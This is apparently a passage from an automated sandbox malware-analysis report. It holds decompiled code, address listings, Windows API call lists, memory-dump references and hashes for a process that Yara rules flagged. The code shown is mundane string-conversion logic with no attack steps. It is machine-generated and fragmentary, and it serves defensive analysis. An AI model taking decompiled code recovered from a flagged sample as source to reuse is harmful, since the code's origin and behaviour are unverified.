                    							if( *(_t68 + _t63) == 0) {
                    								goto L30;
                    							}
                    							_t68 =  &(_t68[0]);
                    							_t67 =  &(_t67[1]);
                    							__eflags = _t68 - _t53;
                    							if(_t68 < _t53) {
                    								continue;
                    							}
                    							goto L30;
                    						}
                    						goto L30;
                    					}
                    					 *((intOrPtr*)(E105CB372())) = 0x16;
                    					return E105C77CB() | 0xffffffff;
                    				}
                    				if(_t53 != 0) {
                    					 *_t67 = 0;
                    					goto L3;
                    				}
                    				return 0;
                    			}
                    0x105cba26
                    0x105cba2f
                    0x105cba34
                    0x105cba37
                    0x105cba3b
                    0x105cba4a
                    0x105cba4d
                    0x105cba6d
                    0x105cba72
                    0x105cba75
                    0x105cba77
                    0x105cbb45
                    0x105cbb4b
                    0x105cbb60
                    0x105cbb6c
                    0x105cbb72
                    0x105cbb74
                    0x105cbb83
                    0x105cbb83
                    0x105cbb83
                    0x105cbb86
                    0x105cbb86
                    0x105cbb8a
                    0x105cbb8c
                    0x105cbb8f
                    0x105cbb8f
                    0x105cbb8f
                    0x105cbb8f
                    0x00000000
                    0x105cbb96
                    0x105cbb7b
                    0x00000000
                    0x105cbb7b
                    0x105cbb4d
                    0x105cbb50
                    0x105cbb53
                    0x105cbb53
                    0x105cbb55
                    0x105cbb56
                    0x105cbb56
                    0x105cbb5a
                    0x00000000
                    0x105cbb5a
                    0x105cba7d
                    0x105cba83
                    0x105cbab0
                    0x105cbabc
                    0x105cbac2
                    0x105cbac4
                    0x00000000
                    0x00000000
                    0x105cbaca
                    0x105cbad0
                    0x105cbad3
                    0x105cbb2f
                    0x105cbb34
                    0x105cbb3c
                    0x00000000
                    0x105cbb3c
                    0x105cbad5
                    0x105cbad8
                    0x105cbada
                    0x105cbadd
                    0x105cbadf
                    0x105cbae1
                    0x105cbb17
                    0x105cbb25
                    0x105cbb2b
                    0x105cbb2d
                    0x105cbb41
                    0x00000000
                    0x105cbb41
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x105cbae3
                    0x105cbae3
                    0x105cbae3
                    0x105cbae6
                    0x105cbae9
                    0x105cbaeb
                    0x00000000
                    0x00000000
                    0x105cbaf5
                    0x105cbafc
                    0x105cbaff
                    0x105cbb01
                    0x105cbb09
                    0x105cbb09
                    0x105cbb0c
                    0x105cbb0d
                    0x105cbb10
                    0x105cbb12
                    0x00000000
                    0x00000000
                    0x00000000
                    0x105cbb12
                    0x105cbb03
                    0x105cbb04
                    0x105cbb07
                    0x00000000
                    0x00000000
                    0x00000000
                    0x105cbb07
                    0x105cbb14
                    0x00000000
                    0x105cbb14
                    0x105cba85
                    0x105cba87
                    0x00000000
                    0x00000000
                    0x105cba8d
                    0x105cba90
                    0x105cba94
                    0x105cba97
                    0x105cba9b
                    0x00000000
                    0x00000000
                    0x105cbaa1
                    0x105cbaa2
                    0x105cbaa5
                    0x105cbaa7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x105cbaa9
                    0x00000000
                    0x105cba90
                    0x105cba54
                    0x00000000
                    0x105cba5f
                    0x105cba41
                    0x105cba47
                    0x00000000
                    0x105cba47
                    0x105cbb9e

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,10592BA7), ref: 105CBABC
                    • GetLastError.KERNEL32 ref: 105CBACA
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 105CBB25
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: 21022116bf5d6837b0bebcf78aae5f7d6e319b716b600fd8393b396d21651974
                    • Instruction ID: 9fb9b540b6f1ce034e46531ce066487a0c93ef7d82f69d90f01d48d26c20634f
                    • Opcode Fuzzy Hash: 21022116bf5d6837b0bebcf78aae5f7d6e319b716b600fd8393b396d21651974
                    • Instruction Fuzzy Hash: 0E41E534A00247AFEB118FE4CE44B6A7FBDEF427A4F114168F8595B1A4DB319D01EB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D39), ref: 0043AC4E
                    • GetLastError.KERNEL32 ref: 0043AC5C
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043ACB7
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: 423051db126c3a8df266828a14b55dd6d99f893ebfa07b077aa324b5e129a5cf
                    • Instruction ID: 194ea371ff84ff86851054fe8b49944eeea2ba512111cdfb336a3f9b4c52f9a6
                    • Opcode Fuzzy Hash: 423051db126c3a8df266828a14b55dd6d99f893ebfa07b077aa324b5e129a5cf
                    • Instruction Fuzzy Hash: DC412930640246AFCF21CF65C844A7F7BA5EF09312F24616AF9955B391D7388D21C75A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
                    • IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
                    • SetLastError.KERNEL32(0000007F), ref: 0040F619
                    • SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLastRead
                    • String ID:
                    • API String ID: 4100373531-0
                    • Opcode ID: c7e9688620f9bae9d1880f1a6b981ae3ed74a0f78203f15c523f219ad1b5e301
                    • Instruction ID: 276675e80245dda8867d672efd476c996cb1fc0ae7fab6a88f5e1639ff5a30e1
                    • Opcode Fuzzy Hash: c7e9688620f9bae9d1880f1a6b981ae3ed74a0f78203f15c523f219ad1b5e301
                    • Instruction Fuzzy Hash: B3419B71A00204EFDB24CF58CC44B6AB7F5FF44711F14887AE446A7A91E739E906DB18
                    Uniqueness

                    Uniqueness Score: -1.00%